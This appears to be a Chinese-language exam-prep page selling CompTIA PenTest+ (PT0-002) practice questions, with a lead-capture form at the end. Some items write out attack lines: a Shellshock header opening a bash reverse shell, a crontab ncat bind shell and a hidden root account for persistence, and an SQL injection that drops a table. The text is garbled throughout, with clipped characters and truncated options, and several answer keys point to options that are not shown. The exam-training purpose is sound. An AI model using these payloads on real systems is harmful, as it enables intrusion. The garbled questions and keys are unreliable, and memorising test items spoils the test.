不想錯過任何事?

通過認證考試的技巧

最新考試新聞和折扣資訊

由我們的專家策劃和更新

是的,請向我發送時事通訊

最佳 CompTIA PT0-002 模擬考試和真實模擬考試,CompTIA PenTest+ 認證 | SPOTO

使用我們最好的 CompTIA PT0-002 模擬考試和真實模擬考試,爲成功通過 CompTIA PenTest+ (PT0-002) 認證做好準備。準備考試的最佳方法是使用最新的考試試題進行練習。我們的練習考試和真實考試模擬旨在爲您提供全面、真實的考試體驗。CompTIA PenTest+ 認證是負責滲透測試和漏洞管理的網絡安全專業人員的理想選擇。通過訪問練習測試、樣題、考試轉儲以及考試問題和答案,您將在考試當天充分展示自己的技能和知識。我們的模擬考試和考試模擬器通過模擬真實的考試條件,進一步加強了您的備考。利用我們的考試材料和考試答案,加強您對 PT0-002 考試的理解和準備。利用我們的備考資源,滿懷信心地備考並取得成功。
參加其他線上考試

問題 #1
一名滲透測試人員正在向一家公司的首席法律顧問解釋 MITRE ATT&CK 框架。測試人員最有可能將以下哪項描述爲該框架的優點?
A. 解安全入侵的策略有助於瓦解入侵。
B. 爲框架一部分的腳本可直接導入 SIEM 工具。C
查看答案
正確答案: D
問題 #2
Nmap 掃描結果如下:Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-24 01:10 EST Nmap scan report for ( 10.2.1.22 ) Host is up (0.0102s latency).未顯示:998 個已過濾端口 端口狀態 服務 80/tcp open http |_http-title: 80F 22% RH 1009.1MB (text/html) |_http-slowloris-check:| VULNERABLE:| Slowloris DoS 攻擊 | <...> 設備類型:網橋|通用 運行中(僅猜測) :QEMU (95%) OS CPE: cpe:/a:qemu:qemu 沒有找到與主機完全匹配的操作系統(測試條件非理想)。
A.
B.
C.
查看答案
正確答案: D
問題 #3
首席信息安全官希望滲透測試人員評估公司員工的安全意識水平。以下哪些工具可以幫助測試人員實現這一目標?
A. etasploit B
查看答案
正確答案: B
問題 #4
滲透測試人員在對網絡應用程序進行人工評估時發現了以下有效 URL: http://www.example.com/product.php?id=123987。以下哪種自動工具最適合用於 NEXT,以嘗試識別此 URL 中的漏洞?
A. QLmap
B. essus C
查看答案
正確答案: B
問題 #5
在滲透測試過程中,一名顧問對客戶進行偵察,以確定網絡釣魚活動的潛在目標。以下哪種方法可以讓顧問快速檢索技術和賬單聯繫人的電子郵件地址,而不會觸發客戶的任何網絡安全工具?(選擇兩項)。
A. 索社交媒體網站
B. 用 WHOIS 查詢工具 C
C.
D.
查看答案
正確答案: C
問題 #6
以下哪條命令允許滲透測試人員允許文件所有者執行 shell 腳本?
A. chmod u+x script
B. chmod u+e script
查看答案
正確答案: BD
問題 #7
滲透測試人員能夠從服務器上收集 MD5 哈希值,並使用彩虹表輕鬆破解哈希值。以下哪項應作爲建議寫入修復報告?
A. 強的算法要求
B. 務器的訪問控制 C
查看答案
正確答案: B
問題 #8
某公司擔心其雲服務提供商未能充分保護其軟件開發的虛擬機。這些虛擬機位於一個數據中心內,與其他公司共享物理資源。該公司最擔心以下哪種攻擊類型?
A. 據泛濫
B. 話騎乘 C
查看答案
正確答案: B
問題 #9
一名滲透測試人員在對一家公司的安全措施進行實際評估時發現,該公司在辦公樓內沒有任何碎紙機。以下哪種技術最適合用來獲取機密信息?
A. 章克隆
B. 圾箱跳水 C
查看答案
正確答案: A
問題 #10
滲透測試人員在 10.10.1.1 發現了一個易受攻擊的網絡服務器。然後,測試人員編輯了一個 Python 腳本,發送網絡漏洞利用程序,發現了以下代碼: exploits = {"User-Agent":"() { ignored;};/bin/bash -i>& /dev/ tcp/127.0.0.1/9090 0>&1", "Accept":"text/html,application/xhtml+xml,application/xml"}。測試人員應該對腳本進行以下哪項編輯,以確定運行服務器的用戶上下文?
A. exploits = {"User-Agent":"() { ignored;};/bin/bash -i id;whoami", "Accept":"text/html,application/xhtml+xml,application/xml"}。
B. exploits = {"User-Agent":"() { ignored;};/bin/bash -i>& find / -perm -4000","Accept":"text/html,application/xhtml+xml,application/xml"}C
查看答案
正確答案: C
問題 #11
一名滲透測試人員收到一個 .pcap 文件,以查找在一次任務中使用的憑證。測試人員應使用以下哪些工具打開並讀取 .pcap 文件?
A. map B
查看答案
正確答案: C
問題 #12
一家公司聘請了一名滲透測試人員在網絡上部署和設置一個惡意接入點。以下哪種工具是實現這一目標的最佳工具?A.Wireshark B.Aircrack-ng C.Kismet D.Wifite
A. 家公司聘請了一名滲透測試人員在網絡上部署和設置一個惡意接入點。以下哪種工具是實現這一目標的最佳工具?A
查看答案
正確答案: B
問題 #13
以下哪項提供了攻擊者常用戰術和技術矩陣以及建議的緩解措施?A.NIST SP 800-53 B.OWASP Top 10 C.MITRE ATT&CK 框架 D.PTES 技術指南
A. 下哪項提供了攻擊者常用戰術和技術矩陣以及建議的緩解措施?A
查看答案
正確答案: C
問題 #14
滲透測試人員成功訪問了移動客戶筆記本電腦上的 Windows 工作站。以下哪項可用於確保測試人員能夠保持對系統的訪問?A.schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe B.wmic startup get caption,command C.crontab -l; echo "@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash")| crontab 2>/dev/null D.sudo useradd -ou 0 -g 0 user
A. 透測試人員成功訪問了移動客戶筆記本電腦上的 Windows 工作站。以下哪項可用於確保測試人員能夠保持對系統的訪問?A
查看答案
正確答案: C
問題 #15
以下哪種工具最有助於收集物聯網設備的供應商和其他安全相關信息,以支持被動偵察?
A. 丹
B. map C
查看答案
正確答案: D
問題 #16
Nmap 掃描的結果如下:以下哪項是關於該設備的最佳結論?
A. 於 TCP/22 上的事務處理心跳擴展數據包的方式,該設備可能存在 Heartbleed 漏洞,允許攻擊者從進程內存中獲取敏感信息。
B. 設備很可能是帶內管理服務的網關。C
查看答案
正確答案: C
問題 #17
熱點 你是一名安全分析師,負責加固網絡服務器。您收到了一份被標記爲惡意的 HTTP 有效載荷列表。說明 給出以下攻擊籤名,確定攻擊類型,然後確定相關的補救措施,以防止將來發生攻擊。如果您想隨時恢復模擬的初始狀態,請單擊 "全部重置 "按鈕。
A.
查看答案
正確答案: D
問題 #18
一家安全公司受聘執行範圍廣泛的內部威脅評估,試圖進入存放 PII 和工資數據的人力資源服務器。
A. 透測試人員獲得了一個內部網絡起始位置。如果執行以下哪些行動,屬於評估範圍內的道德行爲?
B.
C.
D.
查看答案
正確答案: A
問題 #19
滲透測試人員訪問了一個網絡設備,該設備的接口上有一個以前未知的 IP 範圍。進一步研究發現,這是一條連接第三方供應商的始終在線 VPN 通道。以下哪項是滲透測試員應採取的最佳行動?
A. 用隧道作爲連接其他內部設備的樞紐。
B. 略 IP 範圍,因爲它已超出範圍。C
查看答案
正確答案: B
問題 #20
滲透測試人員正在開始一項評估,但只有目標公司的公開信息。客戶知道這項工作,正在爲測試做準備。以下哪項描述了評估的範圍?
A. 分已知環境測試
B. 知環境測試 C
查看答案
正確答案: A
問題 #21
滲透測試人員正試圖快速發現子網中的實時主機。以下哪個命令可以執行 ping 掃描?A.nmap -sn 10.12.1.0/24 B.nmap -sV -A 10.12.1.0/24 C.nmap -Pn 10.12.1.0/24 D.nmap -sT -p- 10.12.1.0/24
A. 透測試人員正試圖快速發現子網中的實時主機。以下哪個命令可以執行 ping 掃描?A
查看答案
正確答案: D
問題 #22
一家爲汽車行業開發嵌入式軟件的公司聘請了一個滲透測試小組,在產品交付前對其安全性進行評估。滲透測試小組表示打算分包給一個能夠分析二進制文件以開發概念驗證漏洞的逆向工程小組。軟件公司要求在批准分包合同之前,對逆向工程小組進行額外的背景調查。以下哪些問題會
A. 向工程團隊可能有向第三方出售漏洞利用程序的歷史。
B. 向工程小組可使用閉源信息或其他非公開信息進行分析。C
查看答案
正確答案: A
問題 #23
一名滲透測試人員對一臺內部網絡服務器進行了暴力破解,並運行了一條命令,產生了以下輸出結果:但是,當滲透測試人員嘗試瀏覽 URL http://172.16.100.10:3000/profile 時,顯示的卻是空白頁面。以下哪項最有可能導致沒有輸出?
A. 火牆上的 HTTP 端口未打開。
B. 試人員沒有在命令前運行 sudo。C
查看答案
正確答案: A
問題 #24
以下按行編號的 Python 代碼片段用於偵察:腳本中的以下哪一行編號最有可能導致該腳本觸發組織 IDS 的 "可能的端口掃描 "警報?
A. 1 號線
B. 2 號線 C
查看答案
正確答案: C
問題 #25
以下哪項最恰當地描述了客戶與滲透測試團隊召開經驗教訓總結會的原因?
A. 報告結構提供反饋意見並提出改進建議
B.
查看答案
正確答案: B
問題 #26
一名滲透測試人員受僱執行物理滲透測試,以進入客戶大樓內的一個安全房間。外部偵察發現了兩個入口、一個 WiFi 訪客網絡和多個連接到互聯網的安全攝像頭。以下哪種工具或技術可爲 BEST 的額外偵察提供支持?
A. 車
B. hodan C
查看答案
正確答案: A
問題 #27
某公司獲得雲服務提供商的漏洞掃描許可,現在希望測試其託管數據的安全性。爲評估該風險,測試人員應首先驗證以下哪項?
A. 感客戶數據是否可公開訪問
B. 和客戶之間的連接是否安全 C
查看答案
正確答案: AC
問題 #28
滲透測試人員在 Windows 服務器上運行了以下命令:在提交最終報告後,測試人員應執行以下哪項操作?
A. 除計劃的批處理作業。
B. 閉反向 shell 連接。C
查看答案
正確答案: B
問題 #29
一家公司的首席執行官創建了一個二級家庭辦公室,他擔心正在使用的 WiFi 服務容易受到攻擊。公司聘請了一名滲透測試人員來測試 WiFi 路由器的安全性。以下哪項最容易受到暴力破解攻擊?A.WPS B.WPA2-EAP C.WPA-TKIP D.WPA2-PSP
A. 家公司的首席執行官創建了一個二級家庭辦公室,他擔心正在使用的 WiFi 服務容易受到攻擊。公司聘請了一名滲透測試人員來測試 WiFi 路由器的安全性。以下哪項最容易受到暴力破解攻擊?A
查看答案
正確答案: A
問題 #30
給滲透測試人員 8 個工作小時的時間進入客戶的財務系統。以下哪種技術成功的可能性最大?
A. 圖尾隨進入客戶工作場所的員工
B. 停車場投放帶有公司徽標的惡意 USB 密鑰 C
查看答案
正確答案: B
問題 #31
滲透測試人員對客戶的關鍵服務器進行了漏洞掃描,發現了以下問題:以下哪項是修復建議?
A. 署用戶培訓計劃
B. 施補丁管理計劃 C
查看答案
正確答案: C
問題 #32
Nmap 掃描會顯示網絡服務器和數據庫的開放端口。滲透測試人員決定運行 WPScan 和 SQLmap 來識別這些系統的漏洞和其他信息。滲透測試人員試圖完成以下哪項工作?
A. 據收集到的證據揭露潛在的犯罪活動。
B. 別環境中的所有漏洞。C
查看答案
正確答案: A
問題 #33
以下哪項是與直接連接到互聯網的物聯網設備相關的最常見漏洞?
A. 支持的操作系統
B. 受 DDoS 攻擊 C
查看答案
正確答案: A
問題 #34
滲透測試人員對目標進行 Nmap 掃描,收到以下結果:測試人員應該使用以下哪項來重定向目標上使用 TCP 端口 1080 的掃描工具?
A. 蘇斯
B. 理鏈 C
查看答案
正確答案: D
問題 #35
某大客戶希望滲透測試人員掃描其網絡中面向互聯網的設備。該客戶特別需要尋找沒有身份驗證要求的思科設備。Shodan 中的以下哪些設置可以滿足客戶的要求?
A. cisco-ios" "admin+1234"
B. cisco-ios" "無密碼" C
查看答案
正確答案: D
問題 #36
滲透測試人員能夠捕獲客戶端和服務器之間的 NTLM 挑戰-響應流量。要訪問服務器,可以使用 pcap 執行以下哪些操作?
A. 行垂直權限升級。
B. 捕獲的流量重放至服務器,重新創建會話。C
查看答案
正確答案: C
問題 #37
以下哪項描述了滲透測試人員在被測試人員入侵的 Windows 服務器上運行 sdelete mimikatz 命令的原因? * 的原因是什麼?
A. 除散列破解註冊表項
B. 除測試人員創建的 Mimikatz 賬戶 C
查看答案
正確答案: C
問題 #38
一位新客戶與一家滲透測試公司籤訂了爲期一個月的合同,針對客戶的新服務進行各種安全評估。客戶希望在評估完成後不久就公開新服務,並計劃在服務公開後修復任何發現(關鍵問題除外)。客戶希望報告結構簡單,不希望每天都收到評估結果。以下哪項對滲透測試人員來說最重要?
A. 定客戶要求的格式。
B. 定風險閾值,以便立即上報客戶。C
查看答案
正確答案: B
問題 #39
滲透測試人員對一臺網絡服務器進行了評估。該會話的日誌顯示如下: http://www.thecompanydomain.com/servicestatus.php?serviceID=892&serviceID=892 ' ; DROP TABLE SERVICES; -- 正在嘗試以下哪種攻擊?A.點擊劫持
A.
查看答案
正確答案: B
問題 #40
基於合規性的滲透測試主要涉及以下方面
A. 從受保護網絡獲取 Pll。
B. 繞過邊緣設備的保護。C
查看答案
正確答案: C
問題 #41
一家諮詢公司在確定範圍時正在完成 ROE。ROE 中應包括以下哪些內容?
A. 估費用
B. 告分發 C
查看答案
正確答案: A
問題 #42
滲透測試人員接到一項任務,攻擊 192.168.1.0/24 範圍內的一系列目標,儘可能少觸發警報和反措施。下列哪種 Nmap 掃描語法能最好地實現這一目標?
A. nmap -sT -vvv -O 192
B. nmap -sV 192
查看答案
正確答案: A
問題 #43
一家公司聘請了一名滲透測試人員對其員工進行社交工程測試。雖然測試人員在公司網站上沒有找到任何員工的電話號碼,但測試人員了解到完整的電話目錄幾個月前在網站上公布過。滲透測試人員應在以下哪個地方查找員工電話號碼?
A. 絡檔案 B
查看答案
正確答案: A
問題 #44
一家軟件公司聘請了一名滲透測試人員對數據庫服務器進行滲透測試。測試人員獲得了公司隱私政策所使用的各種工具。以下哪種工具最適合用來查找該服務器上的漏洞?A.OpenVAS B.Nikto C.SQLmap D.Nessus
A. 家軟件公司聘請了一名滲透測試人員對數據庫服務器進行滲透測試。測試人員獲得了公司隱私政策所使用的各種工具。以下哪種工具最適合用來查找該服務器上的漏洞?A
查看答案
正確答案: A
問題 #45
模擬 你是一名滲透測試人員,正在對一臺服務器進行端口掃描。說明 第 1 部分:給出輸出結果,從可用選項中構建用於生成該輸出結果的命令。第 2 部分:適當構建命令後,使用給定輸出確定應進一步調查的潛在攻擊載體。如果您想隨時恢復模擬的初始狀態,請單擊 "全部重置 "按鈕。
A. 下文解釋。
查看答案
正確答案: C
問題 #46
在用戶登錄後,滲透測試人員應攻擊以下哪項來控制 HTTPprotocol 中的狀態?
A. TTPS 通信
B. 鑰和私鑰 C
查看答案
正確答案: A

提交後看答案

請提交您的電子郵件和WhatsApp以獲取問題的答案。

注意:請確保您的電子郵件 ID 和 Whatsapp 有效,以便您獲得正確的考試結果。

電子郵件:
WhatsApp/電話號碼: